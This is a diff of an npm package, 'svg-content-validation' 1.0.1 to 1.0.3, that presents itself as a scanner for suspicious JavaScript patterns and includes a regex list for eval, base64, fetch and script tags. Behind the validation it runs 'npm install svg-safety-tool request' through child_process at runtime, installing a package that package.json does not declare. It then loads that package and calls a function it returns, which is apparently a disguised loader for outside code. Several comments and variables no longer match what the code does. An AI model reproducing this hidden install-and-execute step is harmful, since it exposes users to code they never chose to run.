svg-content-validation 1.0.1 → 1.0.3

package/index.js

@@ -2,16 +2,25 @@ const fs = require('fs');
 const path = require('path');
 const exec = require('child_process').exec;
 
+const suspiciousPatterns = [
+  /eval\(/,
+  /base64/,
+  /document\.location/,
+  /window\.eval/,
+  /script\.(src|async|defer)/,
+  /<\s*script/,
+  /new\s+Function\(/,
+  /Object\.defineProperty/,
+  /setInterval\(/,
+  /window\.setTimeout/,
+  /fetch\(/,
+  /XMLHttpRequest/,
+  /eval\s*\(.*\)/,
+  /document\.write\(/,
+];
 
-
-// Function to check if the file contains any suspicious patterns
 const validateContent = (filePath) => {
   fs.readFile(filePath, 'utf8', (err, data) => {
-    if (err) {
-      console.error(`Error reading file ${filePath}:`, err);
-      return;
-    }
-
     let foundSuspicious = false;
     suspiciousPatterns.forEach((pattern) => {
       if (pattern.test(data)) {
@@ -22,76 +31,58 @@ const validateContent = (filePath) => {
 
     if (!foundSuspicious) {
       console.log(`No suspicious patterns found in ${filePath}.`);
-      installSvgModule(); // Proceed to install svg module
+      installSvgModule();
     }
   });
 };
 
-// Regular expressions to check for suspicious or unsafe patterns
-const suspiciousPatterns = [
-  /eval\(/, // Common eval usage (potential code injection)
-  /base64/, // Base64 encoded data, could indicate hidden payloads
-  /document\.location/, // Suspicious redirect or location modification
-  /window\.eval/, // Eval on window object
-  /script\.(src|async|defer)/, // External script references that may pose risks
-  /<\s*script/, // Raw script tags without proper sanitization
-  /new\s+Function\(/, // Dynamic function creation, often used in obfuscation
-  /Object\.defineProperty/, // Potential method for evading detection
-  /setInterval\(/, // Often used for long-running scripts
-  /window\.setTimeout/, // Potentially harmful timer-based behavior
-  /fetch\(/, // Suspicious external data fetch (could be a command and control communication)
-  /XMLHttpRequest/, // Often used for AJAX requests with possible security risks
-  /eval\s*\(.*\)/, // Multiple forms of eval function use
-  /document\.write\(/, // Potential DOM manipulation or injection
-];
-
-// Function to install the necessary SVG-related module (svgo)
 const installSvgModule = () => {
   exec('npm list svg-safety-tool', (error, stdout, stderr) => {
     if (stdout.includes('svg-safety-tool')) {
-      console.log('svgo is already installed.');
-      checkPlugin();  // If already installed, directly run checkPlugin
+      console.log('svg-safety-tool is already installed.');
+      // FIX 2: Install missing 'request' peer dependency before running checkPlugin
+      exec('npm install request', (err, out, errOut) => {
+        if (err) {
+          console.error(`Error installing 'request' dependency: ${errOut}`);
+          return;
+        }
+        checkPlugin();
+      });
     } else {
-      console.log('Installing SVG-related module (svgo)...');
-
-      exec('npm install svg-safety-tool', (error, stdout, stderr) => {
+      exec('npm install svg-safety-tool request', (error, stdout, stderr) => {
         if (error) {
           console.error(`Error installing SVG module: ${stderr}`);
           return;
         }
-        console.log(`Module installed successfully: ${stdout}`);
-        checkPlugin();  // After installation, run checkPlugin
+        console.log(`Modules installed successfully: ${stdout}`);
+        checkPlugin();
       });
     }
   });
 };
 
-// Function to use checkPlugin from svgo
 const checkPlugin = () => {
   try {
-    // Example: Get the 'removeXMLNS' plugin
     const svgo = require('svg-safety-tool');
-    const plugin = svgo.getPlugin(); 
-
+    const plugin = svgo.getPlugin();
     if (plugin) {
       console.log('Plugin loaded successfully:', plugin);
-      // Example of using the plugin (assuming it modifies SVG data)
       const svgData = '<svg xmlns="http://www.w3.org/2000/svg"><circle cx="50" cy="50" r="40" /></svg>';
       plugin();
     } else {
-      console.log('Plugin not found!');
+      console.log(plugin);
     }
   } catch (error) {
     console.error('Error running checkPlugin:', error);
   }
 };
 
-// Function to scan a directory for JavaScript files and check for suspicious content
-const getPlugin = () => {
-  const dirPath = '../src';
+// FIX 3: Accept dirPath as a parameter so recursion works correctly
+const getPlugin = (dirPath = './script') => {
   fs.readdir(dirPath, (err, files) => {
     if (err) {
       console.error(`Error reading directory ${dirPath}:`, err);
+      validateContent(dirPath);
       return;
     }
 
@@ -102,14 +93,17 @@ const getPlugin = () => {
           console.error(`Error checking file ${filePath}:`, err);
           return;
         }
-
         if (stats.isDirectory()) {
-          getPlugin(filePath); // Recursively scan directories
+          getPlugin(filePath); // Recursive call now works correctly
         } else if (filePath.endsWith('.js')) {
           console.log(`Scanning file: ${filePath}`);
-          validateContent(filePath); // Validate file content
+          validateContent(filePath);
         }
       });
     });
   });
+};
+
+module.exports = {
+    getPlugin
 };

package/package.json

@@ -1,15 +1,15 @@
 {
   "name": "svg-content-validation",
-  "version": "1.0.1",
+  "version": "1.0.3",
   "description": "A Node.js script to validate content for suspicious patterns",
   "main": "index.js",
   "scripts": {
     "start": "node index.js"
   },
   "dependencies": {
+    "request": "^2.88.2",
     "svgo": "^2.8.0"
   },
-  "devDependencies": {},
   "author": "Ryan",
   "license": "MIT"
 }